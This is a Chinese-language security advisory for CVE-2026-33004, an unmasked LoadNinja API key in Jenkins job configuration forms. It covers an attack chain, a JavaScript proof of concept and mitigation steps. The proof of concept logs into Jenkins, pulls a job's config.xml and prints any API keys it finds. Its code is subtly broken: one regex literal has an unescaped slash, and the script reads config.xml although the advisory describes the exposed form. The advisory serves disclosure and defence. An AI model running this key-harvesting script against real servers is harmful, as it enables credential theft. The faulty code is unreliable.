CVE-2026-33004 Jenkins LoadNinja Plugin API密钥未脱敏信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-33004

漏洞类型

敏感信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jenkins LoadNinja Plugin

漏洞概述

Jenkins LoadNinja Plugin 2.1及更早版本存在敏感信息泄露漏洞。该插件在作业配置表单上显示LoadNinja API密钥时未进行掩码（mask）处理，导致用户输入的API密钥以明文形式呈现在页面中。攻击者通过低权限账户即可访问作业配置页面，观察并捕获这些未脱敏的API密钥。获取的API密钥可被用于进一步访问LoadNinja平台资源，可能导致云资源滥用、敏感测试数据泄露或其他恶意活动。此漏洞增加了凭证被窃取的风险，特别是在多用户Jenkins环境中，攻击者无需特殊权限即可利用此问题。

技术细节

该漏洞属于敏感信息显示漏洞（Sensitive Information Exposure）。LoadNinja Plugin在实现作业配置表单时，直接将API密钥字段的值渲染到HTML页面，而未使用Jenkins标准的密码字段掩码机制（如f:password或@Password注解）。攻击者只需访问包含LoadNinja插件配置的作业页面，即可在表单中看到明文的API密钥。由于Jenkins作业配置页面通常对具有作业配置权限的用户开放（低权限），攻击门槛较低。攻击者获取API密钥后，可直接调用LoadNinja API进行未授权访问，执行负载测试、资源消耗等操作，造成经济损失或服务中断。

攻击链分析

STEP 1

步骤1

攻击者获取Jenkins低权限账户凭据（作业配置权限）

STEP 2

步骤2

攻击者登录Jenkins并导航到使用LoadNinja Plugin配置的作业页面

STEP 3

步骤3

攻击者查看作业配置表单，发现LoadNinja API密钥字段显示为明文

STEP 4

步骤4

攻击者复制暴露的API密钥

STEP 5

步骤5

攻击者使用窃取的API密钥访问LoadNinja平台，执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-33004 PoC - Jenkins LoadNinja Plugin API Key Exposure
// This PoC demonstrates how to identify exposed API keys in Jenkins job configuration

const axios = require('axios');

async function checkJenkinsJobConfig(baseUrl, jobName, username, apiToken) {
    try {
        // Get Jenkinscrumb for CSRF protection
        const crumbResponse = await axios.get(`${baseUrl}/crumbIssuer/api/json`, {
            auth: { username, password: apiToken }
        });
        const crumb = crumbResponse.data.crumbRequestField;
        const crumbValue = crumbResponse.data.crumb;

        // Access job configuration page
        const configUrl = `${baseUrl}/job/${jobName}/config.xml`;
        const response = await axios.get(configUrl, {
            auth: { username, password: apiToken },
            headers: { [crumb]: crumbValue }
        });

        // Search for unmasked API key patterns
        // Look for LoadNinja API key in configuration
        const apiKeyPattern = /<loadNinjaApiKey>([^<]+)<\/loadNinjaApiKey>/g;
        const matches = response.data.match(apiKeyPattern);
        
        if (matches && matches.length > 0) {
            console.log('[+] Potential exposed API keys found:');
            matches.forEach(match => {
                const apiKey = match.replace(/<loadNinjaApiKey>|</loadNinjaApiKey>/g, '');
                console.log('    Key:', apiKey);
            });
            return matches;
        }
        
        console.log('[-] No exposed API keys detected');
        return null;
    } catch (error) {
        console.error('Error:', error.message);
        return null;
    }
}

// Usage
// checkJenkinsJobConfig('http://jenkins-server:8080', 'job-name', 'user', 'api-token');

影响范围

Jenkins LoadNinja Plugin <= 2.1

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 限制Jenkins作业配置页面的访问权限，仅允许必要的管理员用户访问；2) 审计现有使用LoadNinja Plugin的作业，清理可能已暴露的API密钥并重新生成；3) 启用Jenkins的审计日志功能，监控对敏感配置的访问；4) 考虑使用Jenkins凭据存储机制替代明文配置；5) 在Jenkins前部署访问控制，限制非授权用户访问配置页面。